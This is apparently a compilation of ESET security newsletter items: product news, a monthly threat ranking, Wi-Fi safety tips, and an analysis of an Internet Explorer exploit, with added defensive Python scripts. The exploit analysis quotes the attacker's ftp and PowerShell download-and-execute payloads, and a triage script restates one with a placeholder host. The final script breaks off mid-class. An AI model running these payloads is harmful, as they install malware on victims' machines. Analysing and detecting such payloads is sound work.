Brand new security offering from ESET wins accolades from reviewers


Sobering statistics on the cost of cybercrime published by the InfoSec Institute last year say that the average annual cost of cybercrime increased by 26% over the previous year to $11.56 million USD, ranging from $1.3 million to $58 million per organization. The report also highlights recovery and detection as the most costly internal activities. According to EY’s annual global survey, over 37% of companies have no real-time insight into cyber risks and lack agility; they also lack the budget and skills to combat rising cybercrime.

ESET conducted in-depth interviews with customers and IT professionals around the world to learn more about today’s and tomorrow’s business requirements. These findings are at the heart of ESET’s complete reengineering and redesign of its business products, which aim to provide the best protection while lowering the demands on IT teams.

At the core of this new product range is ESET’s all-new remote management console, ESET Remote Administrator. With an improved user experience, a new-look GUI, and seamless functionality, customers can drill down into the smallest details, adjust settings with equal granularity and monitor and control their business’ IT security status via a web console.

This new suite of ESET products boasts a wealth of other features:

  • Mobile protection without the need for additional MDM tools;
  • Flexible report creation to keep stakeholders up to date with the latest IT security information;
  • Full regulatory compliance and hassle-free audits for regulatory bodies;
  • Easy migration for businesses wanting to protect their business with ESET’s award-winning technology;
  • A single Unilicense to protect all supported platforms.

The new Endpoint solutions come with a number of protection technologies (an improved Anti-Phishing module, Exploit Blocker, Vulnerability Shield and Advanced Memory Scanner) that are already well established in ESET’s home-user product line. In the latest AV-Comparatives Anti-Phishing test, ESET scored at the top of the ranking, providing the most comprehensive phishing protection of all tested products.

“After developing the world’s top security products for over two decades we decided on revolution rather than evolution in our product design and architecture. Using our decades-long experience and industry-leading expertise, and by performing extensive research among our current and future clients, we are now delivering our new, robust and unified business product portfolio,” said Richard Marko, Chief Executive Officer at ESET. “Small businesses and large enterprises require solutions that provide the best user experience and the highest level of protection. ESET’s new business products can handle simple and complex network configurations, and local or global operations, including multi-lingual environments, while delivering the highest performance and effectiveness.”

ESET NOD32 technology has an unbeaten record when it comes to malware detection, with 87 consecutive VB100 awards for detection of ‘in-the-wild’ threats, more than any other IT security vendor. ESET products have held an unbroken VB100 record for over 11 years.

“ESET’s products have a superb record in our comparatives stretching back many years, with reliably excellent performances in test after test,” said John Hawes, Chief of Operations at Virus Bulletin. “Their commitment to quality shines through in every aspect of their products, from the attractive and highly usable interface design on the surface to rock-solid stability, low impact on system performance and of course dependable protection from the full spectrum of threats facing our devices and data.”

Testimonials from the first users of the all-new ESET security solutions for businesses confirm their efficiency and effectiveness:

“ESET delivers everything you need in an anti-malware package: great detection rates, small footprint and centralized management. This, combined with the expert support and training the company provides, makes ESET our chosen supplier for protecting our customers’ systems.” Andy M., Managing Director of Miller Solutions, UK

“The Remote Administrator Console made installing ESET over the network simple. The pre-defined policies enabled the set up to work ‘out of the box’, with only a few tweaks needed to reflect our network infrastructure and specific needs.” Gareth L., ESET business customer, United Kingdom


‘Citadel’ trojan attacking password managers

Using a password manager is often recommended as good practice to avoid reusing the same logins, but a new configuration of the Citadel trojan has been uncovered that specifically targets the password managers holding all of those credentials.

Neowin reports that the malware, named ‘Citadel’, is “highly evasive” and can lie dormant on infected computers for “an indefinite amount of time”, to be awoken by a specific user action, meaning that most people will be blissfully unaware that their computer has been compromised. It has allegedly already infected ‘millions’ of computers.

Ars Technica reports that a configuration file had been modified to get the Citadel trojan to begin keylogging when an infected computer opens either Password Safe or KeePass. The Register claims that the neXus Personal Security Client has also been targeted.

The malware works by “injecting itself into explorer.exe processes and hooking into APIs.” It then downloads a configuration file from a central server; it is this configuration that tells it which processes to watch for before it starts keylogging.

The discovery was made by IBM Trusteer, and the company’s director of enterprise security, Dana Tamir, told Ars Technica that the extent of the attacks is currently limited, but that a focus on password managers could become a more common method of attack. “Once the malware captures this master key, then they can use that master key to exercise complete control over the machine and any of the user’s online accounts,” Tamir explained.

“I think that password managers and authentication solutions are more critical than ever. But it is important to keep in mind that these solutions are not sufficient in and of themselves—they have to be accessed from a clean machine,” she added.

The configuration file suggests that the attackers were using a ‘legitimate web server’ as the command-and-control server, but the files were removed from the server by the time researchers discovered it, so at this point the identity of who is behind the attacks remains a mystery.

First exploitation of Internet Explorer ‘Unicorn bug’ in-the-wild

Microsoft released a patch last week for a critical vulnerability allowing remote code execution in Internet Explorer. This vulnerability, known as CVE-2014-6332 and discovered by an IBM X-Force security researcher, is significant because it is an old bug in the handling of OLE automation arrays used by VBScript, present in Internet Explorer versions 3 through 11. This means that most, if not all, Internet Explorer users are vulnerable unless they are running patched systems. It gets worse: the vulnerability can not only be used by an attacker to run arbitrary code on a remote machine, but it can also bypass the Enhanced Protected Mode (EPM) sandbox in IE11 as well as Microsoft’s free anti-exploitation tool, the Enhanced Mitigation Experience Toolkit (EMET).

Earlier this week, a proof-of-concept (PoC) successfully exploiting this vulnerability in Internet Explorer was made publicly available. The PoC showed that arbitrary code could be run on a machine merely by visiting a specially crafted website with an unpatched version of Internet Explorer. It was thus only a matter of time before we started seeing this vulnerability actively used as part of a cybercriminal campaign. Scouring our data, we found several blocked exploitation attempts while our users were browsing a major Bulgarian website. As you might have guessed, the compromised website was using CVE-2014-6332 to install malware on the computers of its unsuspecting visitors.

Compromised Website details

This news agency website, ranked among the 50 most visited websites in Bulgaria and in the top 11,000 worldwide according to Alexa, might just be part of the first significant in-the-wild use of this vulnerability. As far as we can tell, only one page on the website has been compromised and is serving this exploit, possibly indicating a testing phase. The page is about the winners of a TV reality show.


The page source contains an invisible HTML iframe pointing to the exploit:


As seen above, the exploit is hosted on the domain natmasla[.]ru. It is detected by ESET as Win32/Exploit.CVE-2014-6332.A.

The exploit is based on proof-of-concept code published by a Chinese researcher. Here are the credits in this original proof-of-concept:





It is easily modified and lets the attacker write the payload in VBScript.

Strangely, the exploit is actually present twice in a row. The first time, the payload is:

cd %TEMP%&
@echo open>%TEMP%\KdFKkDls.txt&
@echo [REDACTED]>>%TEMP%\KdFKkDls.txt&
@echo binary>>%TEMP%\KdFKkDls.txt&
@echo get natmasla.exe>>%TEMP%\KdFKkDls.txt&
@echo ! natmasla.exe>>%TEMP%\KdFKkDls.txt&
@echo ! del natmasla.exe>>%TEMP%\KdFKkDls.txt&
@echo bye>>%TEMP%\KdFKkDls.txt&
ftp -s:%TEMP%\KdFKkDls.txt&
del %TEMP%\KdFKkDls.txt

It is basically a series of commands executed in the context of cmd.exe. The first group, prefixed by @echo, writes an ftp script into a text file (“KdFKkDls.txt” here, but the name is different each time one pulls the exploit). The file is then passed to the ftp command through its -s: option, which makes ftp read its commands from the file instead of the keyboard. The script connects to an ftp server with a username and password, switches to binary mode, downloads a binary, and then uses ftp’s “!” escape, which runs the rest of the line as a local shell command, to execute the downloaded file and delete it afterwards. Finally the script file itself is deleted to remove traces.

In the second case, the payload is:

powershell.exe (New-Object System.Net.WebClient).DownloadFile('hxxp://natmasla[.]ru/ath/sploit/natmasla.exe','%TEMP%\natmasla.exe');(New-Object -com Shell.Application).ShellExecute('%TEMP%\natmasla.exe')

This time it uses PowerShell’s WebClient to download a binary payload over HTTP and Shell.Application to launch it; the binary is actually the same as the one downloaded by the first payload. During our investigation we observed some network difficulties when we tried to fetch the exploit, which could be the reason for the two payloads relying on different network resources (FTP in the first case, HTTP in the second).

The downloaded binary is detected by ESET as Win32/IRCBot.NHR. This malware has numerous capabilities, such as launching DDoS attacks or opening remote shells for the miscreants. Amusingly, it contains an Einstein quotation: “Anyone who has never made a mistake has never tried anything new.”
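To turn the two payloads above into indicators quickly, here is a small triage helper. It is an added example for this article, not ESET’s code: it takes the command string the exploit hands to cmd.exe, reconstructs the ftp script the way ftp.exe would read it with -s: (server, credentials, downloaded file, “!” escapes), and pulls the URL and launched file out of the PowerShell variant. The two samples are constructed: the redacted ftp line from the page is replaced with a placeholder host, username and password, and splitting on a bare “&” is an assumption that holds for these payloads but is not a full cmd.exe parser.

```python
"""Triage of the cmd.exe payloads carried by the CVE-2014-6332 exploit.
Added example, not ESET's code. Samples are constructed (see lead-in)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

ECHO_RE = re.compile(r"^@?echo\s+(?P<line>.*?)\s*>>?\s*(?P<file>\S+)$", re.I)
FTP_S_RE = re.compile(r"\bftp(?:\.exe)?\s+-s:(?P<file>\S+)", re.I)
DOWNLOADFILE_RE = re.compile(
    r"DownloadFile\(\s*['\"](?P<url>[^'\"]+)['\"]\s*,\s*['\"](?P<dest>[^'\"]+)['\"]\s*\)", re.I)
SHELLEXECUTE_RE = re.compile(r"ShellExecute\(\s*['\"](?P<target>[^'\"]+)['\"]", re.I)
FTP_VERBS = {"open", "user", "binary", "ascii", "get", "mget", "recv",
             "bye", "quit", "cd", "lcd", "prompt"}

@dataclass
class Triage:
    technique: str
    script_file: Optional[str] = None
    ftp_host: Optional[str] = None
    credentials: List[str] = field(default_factory=list)
    downloads: List[str] = field(default_factory=list)       # files fetched
    executes: List[str] = field(default_factory=list)        # files launched
    shell_commands: List[str] = field(default_factory=list)  # other "!" escapes

def _interpret_ftp_script(lines: List[str], t: Triage) -> None:
    """Walk the script the way ftp.exe consumes it when started with -s:."""
    expect_host = False
    for line in lines:
        line = line.strip()
        if not line:
            continue
        if line.startswith("!"):              # "!" runs the rest as a local shell command
            cmd = line[1:].strip()
            first = cmd.split()[0].rsplit("\\", 1)[-1].lower() if cmd else ""
            if first in {d.lower() for d in t.downloads}:
                t.executes.append(first)      # launching what was just downloaded
            else:
                t.shell_commands.append(cmd)
            continue
        parts = line.split()
        verb = parts[0].lower()
        if expect_host:
            t.ftp_host, expect_host = parts[0], False
        elif verb == "open":
            if len(parts) > 1:
                t.ftp_host = parts[1]
            else:
                expect_host = True            # bare "open": ftp prompts for the host next
        elif verb in ("get", "recv", "mget") and len(parts) > 1:
            t.downloads.append(parts[1])
        elif verb not in FTP_VERBS:           # non-command lines answer the user/password prompts
            t.credentials.append(line)

def triage(payload: str) -> Triage:
    """Classify a payload and extract its network and execution indicators."""
    if DOWNLOADFILE_RE.search(payload) or SHELLEXECUTE_RE.search(payload):
        t = Triage(technique="powershell-webclient")
        t.downloads = [m.group("url") for m in DOWNLOADFILE_RE.finditer(payload)]
        t.executes = [m.group("target") for m in SHELLEXECUTE_RE.finditer(payload)]
        return t
    t = Triage(technique="ftp-s-script")
    scripts = {}                              # script file -> lines echoed into it, in order
    for cmd in (c.strip() for c in payload.replace("\n", "").split("&")):
        m = ECHO_RE.match(cmd)
        if m:
            scripts.setdefault(m.group("file"), []).append(m.group("line"))
            continue
        m = FTP_S_RE.search(cmd)
        if m:
            t.script_file = m.group("file")
    if t.script_file in scripts:
        _interpret_ftp_script(scripts[t.script_file], t)
    return t

# Constructed samples: the page's first payload with the redacted line replaced
# by a placeholder host/user/password, and the PowerShell payload as shown.
FTP_PAYLOAD = r"""cd %TEMP%&
@echo open>%TEMP%\KdFKkDls.txt&
@echo ftp.example.invalid>>%TEMP%\KdFKkDls.txt&
@echo analyst>>%TEMP%\KdFKkDls.txt&
@echo hunter2>>%TEMP%\KdFKkDls.txt&
@echo binary>>%TEMP%\KdFKkDls.txt&
@echo get natmasla.exe>>%TEMP%\KdFKkDls.txt&
@echo ! natmasla.exe>>%TEMP%\KdFKkDls.txt&
@echo ! del natmasla.exe>>%TEMP%\KdFKkDls.txt&
@echo bye>>%TEMP%\KdFKkDls.txt&
ftp -s:%TEMP%\KdFKkDls.txt&
del %TEMP%\KdFKkDls.txt"""

PS_PAYLOAD = (r"powershell.exe (New-Object System.Net.WebClient).DownloadFile("
              r"'hxxp://natmasla[.]ru/ath/sploit/natmasla.exe','%TEMP%\natmasla.exe');"
              r"(New-Object -com Shell.Application).ShellExecute('%TEMP%\natmasla.exe')")

if __name__ == "__main__":
    for p in (FTP_PAYLOAD, PS_PAYLOAD):
        print(triage(p))
```

Both payloads reduce to the same three facts an incident responder needs: where the binary comes from, what it is called on disk, and that it is executed straight from %TEMP%. Those are exactly the fields worth matching in proxy, firewall and endpoint logs.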


Although we were not able to link this particular incident to a known exploit kit, it is only a matter of time before mainstream kits integrate this vulnerability. Since all supported versions of Windows were vulnerable to this exploit before the patch was released last week, we can expect its success rate against unpatched systems to be very high. If you haven’t updated Internet Explorer yet, please take the time to do it right now through Windows Update.

WhatsApp gets tough on security

The popular messaging service WhatsApp has stepped up security for users of its consumer messaging service by adopting end-to-end encryption.

In what the BBC describes as the largest rollout of this level of encryption in any messaging system worldwide, WhatsApp integrated Open Whisper Systems’ TextSecure protocol, turned on by default for Android users, with WhatsApp’s iOS users to follow. An Open Whisper Systems blog post cautioned that the team still “have a ways to go until all mobile platforms are fully supported, but we are moving quickly towards a world where all WhatsApp users will get end-to-end encryption by default.”

What makes this end-to-end solution so significant is that messages are never decrypted in transit or on the messaging service’s servers. Encryption and decryption happen only on the devices that send and receive the messages, meaning not even WhatsApp itself can read your private messages. In addition, the protocol supports asynchronous messaging: an encrypted message can be sent while the recipient is offline and decrypted when that device comes back online.

In addition, each message is encrypted with its own one-time message key. Even if someone managed to recover the key for one message, it would not be usable to decode other messages, as reported by The Register.

That said, Open Whisper Systems were quick to point out that, “The WhatsApp Android client does not yet support encrypted messaging for group chat or media messages, but we’ll be rolling out support for those next…”
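The two properties described above, one key per message and delivery that still works when the recipient is offline or messages arrive out of order, come from the symmetric “hash ratchet” in the TextSecure design. The following is an added illustration for this article, not WhatsApp’s or Open Whisper Systems’ code: it implements only that symmetric ratchet (the Diffie-Hellman ratchet and session setup are omitted), the shared starting chain key is a constructed constant standing in for what the real protocol negotiates, and HMAC-SHA256 is used both as the key derivation function and, in counter mode, as the cipher so that the example needs only the standard library. A production system uses a real authenticated cipher in its place.

```python
"""Simplified TextSecure-style symmetric ratchet. Added example, not
WhatsApp's or Open Whisper Systems' code; root key below is constructed."""
import hmac
from hashlib import sha256
from typing import Dict, Tuple

def _kdf(key: bytes, label: bytes) -> bytes:
    return hmac.new(key, label, sha256).digest()

class SymmetricRatchet:
    """Each step yields one message key and advances the chain key. The old
    chain key is overwritten, so a later compromise of the device cannot
    recompute earlier message keys from this chain."""
    def __init__(self, chain_key: bytes) -> None:
        self._chain_key = chain_key
        self._next_index = 0
        self._skipped: Dict[int, bytes] = {}   # keys for messages not yet received

    def _step(self) -> Tuple[int, bytes]:
        index, message_key = self._next_index, _kdf(self._chain_key, b"\x01")
        self._chain_key = _kdf(self._chain_key, b"\x02")
        self._next_index += 1
        return index, message_key

    def sender_key(self) -> Tuple[int, bytes]:
        return self._step()

    def receiver_key(self, index: int) -> bytes:
        """Key for message `index`; derives and caches skipped keys so
        messages may arrive in any order (asynchronous delivery)."""
        if index in self._skipped:
            return self._skipped.pop(index)
        if index < self._next_index:
            raise KeyError(f"key for message {index} already used and discarded")
        while self._next_index < index:
            i, k = self._step()
            self._skipped[i] = k
        return self._step()[1]

def _keystream(key: bytes, length: int) -> bytes:
    """HMAC in counter mode as a stand-in stream cipher (illustration only)."""
    out, counter = b"", 0
    while len(out) < length:
        out += _kdf(key, b"stream" + counter.to_bytes(4, "big"))
        counter += 1
    return out[:length]

def encrypt(message_key: bytes, index: int, plaintext: bytes) -> Tuple[bytes, bytes]:
    enc_key, mac_key = _kdf(message_key, b"enc"), _kdf(message_key, b"mac")
    ciphertext = bytes(p ^ k for p, k in zip(plaintext, _keystream(enc_key, len(plaintext))))
    tag = hmac.new(mac_key, index.to_bytes(4, "big") + ciphertext, sha256).digest()
    return ciphertext, tag

def decrypt(message_key: bytes, index: int, ciphertext: bytes, tag: bytes) -> bytes:
    enc_key, mac_key = _kdf(message_key, b"enc"), _kdf(message_key, b"mac")
    expected = hmac.new(mac_key, index.to_bytes(4, "big") + ciphertext, sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("authentication failed: message altered or wrong key")
    return bytes(c ^ k for c, k in zip(ciphertext, _keystream(enc_key, len(ciphertext))))

# Constructed constant; the real protocol derives this from the key agreement.
SHARED_CHAIN_KEY = sha256(b"constructed demo root key, not from any real session").digest()

def demo_out_of_order() -> Dict[int, bytes]:
    """Alice sends three messages; Bob, who was offline, receives them in the
    order 2, 0, 1 and still decrypts every one with its own key."""
    alice, bob = SymmetricRatchet(SHARED_CHAIN_KEY), SymmetricRatchet(SHARED_CHAIN_KEY)
    wire = {}
    for pt in (b"meet at 9", b"bring the report", b"running late"):
        i, k = alice.sender_key()
        wire[i] = encrypt(k, i, pt)
    received = {}
    for i in (2, 0, 1):
        ct, tag = wire[i]
        received[i] = decrypt(bob.receiver_key(i), i, ct, tag)
    return received

if __name__ == "__main__":
    print(demo_out_of_order())
```

The point to notice is in receiver_key: a message that arrives early forces the receiver to derive and park the keys it skipped over, while a message whose key has already been consumed can no longer be decrypted, which is what “one-time message key” means in practice.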

WhatsApp has somewhere in the region of 600 million active users, making it the most popular messaging tool by some margin in most of the world’s major territories.

Public Wi-Fi hotspots – know the risks

Using public Wi-Fi can be risky – and security experts such as Europol’s Troels Oerting have even suggested it’s TOO risky, and that we should abandon public Wi-Fi hotspots altogether.

If your computer happens to be filled with trade secrets (or any business data for that matter), that’s probably a good idea – your colleagues will appreciate your waiting until you are somewhere you can connect securely.

Earlier this year, Oerting, the head of Europe’s Europol Cyber Crime division, warned that free hotspots were increasingly used to steal private information from consumers in Europe, as reported by We Live Security here. Oerting said, “We have seen an increase in the misuse of Wi-Fi in order to steal information, identity or passwords and money from the users who use public or insecure wi-fi connections.”

Up to 10% of workers admit to using public hotspots with work machines, according to a recent survey by phone insurer ProtectYourBubble.

For ordinary PC and smartphone users, public Wi-Fi is not ideal – but it’s sometimes near-inescapable.

ESET Researcher Stephen Cobb says in a how-to for computing on the go,

“Consider using a 3G or 4G hotspot instead of hotel Internet or free public Wi-Fi hotspots. If you are logging into a work network, use a VPN, and do not visit banking or shopping sites.”

Frequent travellers might find it cheaper to buy a local SIM card for data – or share a 3G or 4G data connection from a smart device.

But if you are travelling somewhere where cellphone reception is poor, these steps will help you get online as safely as possible.

Double-check the network before you use it


The worst thing you can do is assume a Wi-Fi network is legitimate – or run by the establishment you’re in. It might be a decoy deployed by a criminal.

As a general rule, don’t connect to any network called, ‘Free Wi-Fi’ – if they’re advertising that, they may well want you to sign up for a newsletter or endure adverts, even if the hotspot isn’t malicious.

Mark James, ESET Security Specialist, says, “If it’s a public service (coffee shop, McDonalds etc.) check the WiFi name with a member of staff – don’t just connect to the first one you see, it could be there to harvest your information.”

It’s probably safer NOT to check email and Facebook on your cellphone

Once you’ve reassured yourself that the hotspot is legitimate, you probably want to check your email – this is best done via your PC, as you can use the browser’s secure icon (usually a padlock in the address bar) to check that you are connected securely (i.e. via HTTPS).

Hackers monitoring network traffic are looking for you to type in passwords – email account passwords, social network passwords.

Mark James, ESET Security Specialist says, ‘I would personally limit my activities to anything that does not require a username and password to log in, but please bear in mind most apps on your smartphone will auto login. Generally browsing and information look-ups are going to be fairly safe.’

Overall, smartphones come a poor second to PCs or Macs when it comes to public Wi-Fi hotspots – the ‘defenses’ built into PC browsers make it easier to reassure yourself you’re being safe.

Using email apps on your phone can leak data – a secure HTTPS website is better, ESET’s Mark James says.

“For email, it’s better to use a secure HTTPS website for emails rather than using pop3 from your mobile, as this is easily interrogated using free apps on the same WiFi connection.” If you’re sending corporate email, or sensitive emails, it’s best to use encryption (a more detailed We Live Security how-to offers tips here).

What not to say in public Wi-Fi hotspots


Typically, attacks on Wi-Fi hotspots are ‘man-in-the-middle’ attacks – where an attacker is able to access your data as it travels.

That means anything financial or corporate is out – don’t type in your credit card details, don’t buy anything, don’t visit your bank’s website.

If you have to connect to your work environment, use a VPN – otherwise, wait until you’re in a safer environment.

Prepare yourself first

If you’re going to use your computer in a risky environment, ensure sharing is switched off – you don’t want unknown attackers having access to your files.

On a Mac, you’ll find this under System Preferences > Sharing.

On a PC your homegroup and sharing settings will vary according to your OS.

Set all your websites to ‘secure’ before you log on

Most web services offer the option to use HTTPS – secure browsing – for every connection. It’s sensible to ensure that you’ve activated this on services you use frequently.

HTTPS both encrypts your traffic and helps ensure that the browser is connecting to the site it thinks it is. The Electronic Frontier Foundation offers a browser plug-in, HTTPS Everywhere, which forces your browser to connect via HTTPS where possible.

Many services – such as Gmail – do this by default, but others which don’t default to the more secure setting will offer an option to enable it. Find it in your account’s ‘Settings’ menu and enable it.

What CAN you do?

Travelers will be on safe ground researching information, or checking news sites, or looking at maps of the local area – but anything financial, such as booking a hotel, is best done either via your mobile device’s connection, or just over the phone.

When to say, ‘No’ to a hotspot


In remote areas, or certain countries in the Far East, it’s perfectly normal to encounter Wi-Fi networks with no security whatsoever – in most cases, this is simply for ease of use, as guests are constantly traveling through the hotel or bar, or cafe.

Don’t connect to these hotspots, ESET’s Mark James warns: “If someone is snooping your data you will NOT know they are doing it.”

Forget the hotspot when you leave

Even big chain Wi-Fi Hotspots pose risks – and the last thing you want is your smart device attempting to connect to the same hotspot later, when you’re not looking.

Smart devices can give away a surprising amount of data from apps connecting to remote servers – so it’s always a good policy to police your list of ‘known’ networks thoroughly.

The worst of these can be Hotspot networks which your cellphone provider has a deal with – which phones will sometimes default to connecting to, without alerting the user, as reported by We Live Security here.

The report found that the two services (AT&T Wi-Fi and Comcast’s Xfinity Wi-Fi) allowed smartphones to reconnect to public Wi-Fi hotspots automatically, which could leave users vulnerable to fake hotspots with the right name, able to redirect users to bogus websites to harvest usernames and passwords.

Ars Technica’s IT editor Sean Gallagher writes that the services open both Android and iPhone to a serious security threat, saying, “There’s a much bigger threat to your security than somebody randomly fishing for you to connect to them—the networks you’ve already connected to and trusted, like AT&T and Xfinity.”
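Policing the list of known networks on a Windows laptop means reading the output of `netsh wlan show profiles` (the list of saved names) and `netsh wlan show profiles name="..."` (one profile’s details). As an added example for this article (not ESET’s or Microsoft’s code), the script below parses that text offline and flags profiles that are both open (no authentication) and set to reconnect automatically, which is exactly the combination the carrier-hotspot report above warns about. The sample output is constructed to follow the layout netsh prints; the audit keys on the “Name”, “Connection mode” and “Authentication” fields, and the two remediation commands it prints are real netsh commands.

```python
"""Audit saved Wi-Fi profiles for open networks that auto-reconnect.
Added example, not ESET's or Microsoft's code. Sample output is constructed
to follow the layout of `netsh wlan show profiles name="..."`."""
import re
from typing import Dict, List

KV_RE = re.compile(r"^\s*(?P<key>[A-Za-z][A-Za-z ]*?)\s*:\s*(?P<value>.*?)\s*$")

def parse_profiles(text: str) -> List[Dict[str, str]]:
    """Collect one record per profile from concatenated netsh output.
    A 'Name' line starts a new record; later fields attach to it."""
    profiles: List[Dict[str, str]] = []
    for line in text.splitlines():
        m = KV_RE.match(line)
        if not m:
            continue
        key, value = m.group("key"), m.group("value")
        if key == "Name":
            profiles.append({"name": value})
        elif profiles and key in ("Connection mode", "Authentication", "Cipher"):
            profiles[-1][key.lower()] = value
    return profiles

def audit(text: str) -> List[Dict[str, str]]:
    """Flag profiles that are open AND connect automatically, with fixes."""
    flagged = []
    for p in parse_profiles(text):
        auto = "automatically" in p.get("connection mode", "").lower()
        open_net = p.get("authentication", "").lower() == "open"
        if auto and open_net:
            name = p["name"]
            flagged.append({
                "name": name,
                "reason": "open network with automatic reconnect",
                # Either command is real netsh syntax; deleting is the safer choice.
                "fix": f'netsh wlan set profileparameter name="{name}" connectionmode=manual',
                "delete": f'netsh wlan delete profile name="{name}"',
            })
    return flagged

# Constructed sample: three profiles in the layout netsh uses.
SAMPLE_NETSH_OUTPUT = """\
Profile Free Wi-Fi on interface Wi-Fi:
=======================================================================

Applied: All User Profile

Profile information
-------------------
    Version                : 1
    Type                   : Wireless LAN
    Name                   : Free Wi-Fi
    Control options        :
        Connection mode    : Connect automatically
        Network broadcast  : Connect only if this network is broadcasting
        AutoSwitch         : Do not switch to other networks

Security settings
-----------------
    Authentication         : Open
    Cipher                 : None
    Security key           : Absent

Profile HomeNet on interface Wi-Fi:
=======================================================================
    Name                   : HomeNet
        Connection mode    : Connect automatically
    Authentication         : WPA2-Personal
    Cipher                 : CCMP
    Security key           : Present

Profile CafeGuest on interface Wi-Fi:
=======================================================================
    Name                   : CafeGuest
        Connection mode    : Connect manually
    Authentication         : Open
    Cipher                 : None
    Security key           : Absent
"""

if __name__ == "__main__":
    import sys
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_NETSH_OUTPUT
    for finding in audit(data):
        print(f'{finding["name"]}: {finding["reason"]}\n  {finding["delete"]}')
```

On a real machine, pipe the concatenated per-profile output into the script; the open-but-manual CafeGuest profile is deliberately not flagged, since a network you must pick by hand cannot be impersonated behind your back in the way the article describes.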

ESET awarded highest score in AV-Comparatives Performance Test


ESET received the highest score for the latest release of ESET Smart Security in the latest AV-Comparatives Performance Test.

Published yesterday, the AV-Comparatives results give the new version of ESET Smart Security the Advanced+ Award. Details of the test show that ESET achieved the highest score for performance, outperforming all contenders, including AVG, Avira, Bitdefender, F-Secure, Kaspersky, McAfee, Sophos and Trend Micro.

AV-Comparatives focused on testing the impact that security software can have on system performance when specific tasks, such as downloading, opening, copying, encoding and archiving files, as well as installing and launching applications, are performed.

AV-Comparatives used several of its own test cases as well as PCMark, an industry-recognized performance benchmark. The award is based on AV-Comparatives’ assessment of the overall impact results with default settings under Windows 8.1 64-bit.

“During the whole year ESET showed an excellent performance in all of our tests. As well as being very good at protecting the customer, it showed that it has nearly no impact on the speed of the computer in the latest performance test too,” said Andreas Clementi, CEO at AV-Comparatives.

ESET Smart Security delivers multiple layers of Internet protection and keeps your identity safe with Anti-Theft, Personal Firewall and Anti-Phishing. This ESET security suite boasts brand new technology such as Botnet Protection that protects against infiltration by botnet malware as well as Enhanced Exploit Blocker that blocks attacks specifically designed to evade antivirus detection.

“We are really pleased with this award,” said Ignacio Sbampato, Chief Sales and Marketing Officer at ESET. “Offering stellar protection against today’s threats is an absolute must for any security vendor, but doing so with absolute minimum system impact is an art, which – done well – makes a huge difference to customers.”



Monthly Threat Report: October 2014


The Top Ten Threats


1. HTML/Refresh
Previous Ranking: 1
Percentage Detected: 3.66%

HTML/Refresh is a Trojan that redirects the browser to a specific URL location with malicious software. The program code of the malware is usually embedded in HTML pages.


2. Win32/Bundpil
Previous Ranking: 2
Percentage Detected: 2.24%

Win32/Bundpil.A is a worm that spreads via removable media. The worm contains a URL from which it tries to download several files. The files are then executed, and the HTTP protocol is used for communication with the C&C server to receive new commands. The worm may delete the following folders:



3. JS/Kryptik.I
Previous Ranking: 3
Percentage Detected: 2.17%

JS/Kryptik is a generic detection of malicious obfuscated JavaScript code embedded in HTML pages; it usually redirects the browser to a malicious URL or implements a specific exploit.


4. Win32/RiskWare.NetFilter
Previous Ranking: 5
Percentage Detected: 1.49%

Win32/RiskWare.NetFilter is an application that includes malicious code designed to force infected computers to allow an attacker to remotely connect to the infected system and control it, in order to steal sensitive information or install other malware.


5. Win32/Adware.MultiPlug
Previous Ranking: 4
Percentage Detected: 1.47%

Win32/Adware.Multiplug is a Potentially Unwanted Application that, once present on the user’s system, may cause applications to display advertising pop-up windows during internet browsing.


6. HTML/ScrInject
Previous Ranking: n/a
Percentage Detected: 1.45%

Generic detection of HTML web pages containing obfuscated scripts or iframe tags that automatically redirect to a malware download.


7. LNK/Agent.AK
Previous Ranking: 6
Percentage Detected: 1.40%

LNK/Agent.AK is a link that concatenates commands to execute legitimate code while running the threat code in the background. It is similar in its effect to the older autorun.inf type of threat. This vulnerability became known at the time of the discovery of Stuxnet, as it was one of four vulnerabilities exploited by Stuxnet variants.


8. Win32/Sality
Previous Ranking: 7
Percentage Detected: 1.34%

Sality is a polymorphic file infector. When executed it starts a service and creates or deletes registry keys related to security applications active on the system, and it ensures that the malicious process restarts at each reboot of the operating system. It modifies EXE and SCR files and disables services and processes implemented by and associated with security solutions.


9. HTML/Iframe
Previous Ranking: 8
Percentage Detected: 1.24%

Type of infiltration: Virus
HTML/Iframe.B is generic detection of malicious IFRAME tags embedded in HTML pages, which redirect the browser to a specific URL location with malicious software.


10. INF/Autorun
Previous Ranking: 10
Percentage Detected: 1.22%

INF/Autorun is a generic detection of versions of the autorun.inf configuration file created by malware. The malicious AUTORUN.INF file contains the path to the malware executable. This file is usually dropped into the root folder of all the available drives in an attempt to autorun a malware executable when the infected drive is mounted. The AUTORUN.INF file(s) may have the System (S) and Hidden (H) attributes present in an attempt to hide the file from Windows Explorer.
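Three of the entries above (HTML/Refresh, HTML/ScrInject and HTML/Iframe) and the invisible iframe on the compromised Bulgarian news page described earlier are all variations on the same trick: an HTML page that silently sends the browser somewhere else. The following is an added example for this article, not ESET’s detection logic: a static scanner, built on Python’s standard html.parser, that reports hidden iframes (zero or one-pixel dimensions, display:none, visibility:hidden, or parked off-screen), meta-refresh redirects, and inline scripts that combine an unescape/eval/document.write call with a long run of escaped bytes. The thresholds and the sample page are constructed for illustration, so treat hits as triage leads rather than verdicts.

```python
"""Static scan for HTML redirection tricks: hidden iframes, meta refresh and
obfuscated inline scripts. Added example, not ESET's detection logic; the
escape threshold and sample page are constructed for illustration."""
import re
from html.parser import HTMLParser
from typing import Dict, List, Optional, Tuple

OBFUSCATION_MARKERS = ("eval(", "unescape(", "fromcharcode", "document.write(")
ESCAPE_RE = re.compile(r"(?:\\x|%)[0-9a-fA-F]{2}")
MIN_ESCAPES = 16   # assumption: this many escaped bytes in one script is suspicious

def _iframe_is_hidden(attrs: Dict[str, str]) -> bool:
    """True if the iframe would not be visible to the visitor."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    if re.search(r"(?:left|top):-\d", style):            # parked off-screen
        return True
    def dim(name: str) -> Optional[int]:
        raw = attrs.get(name)                             # width="0" style attribute
        if raw is None:
            m = re.search(name + r":(\d+)", style)        # or width:0px in CSS
            raw = m.group(1) if m else None
        digits = re.sub(r"\D", "", raw or "")
        return int(digits) if digits else None
    w, h = dim("width"), dim("height")
    return (w is not None and w <= 1) or (h is not None and h <= 1)

class RedirectScanner(HTMLParser):
    def __init__(self) -> None:
        super().__init__()
        self.findings: List[Dict[str, str]] = []
        self._in_script = False
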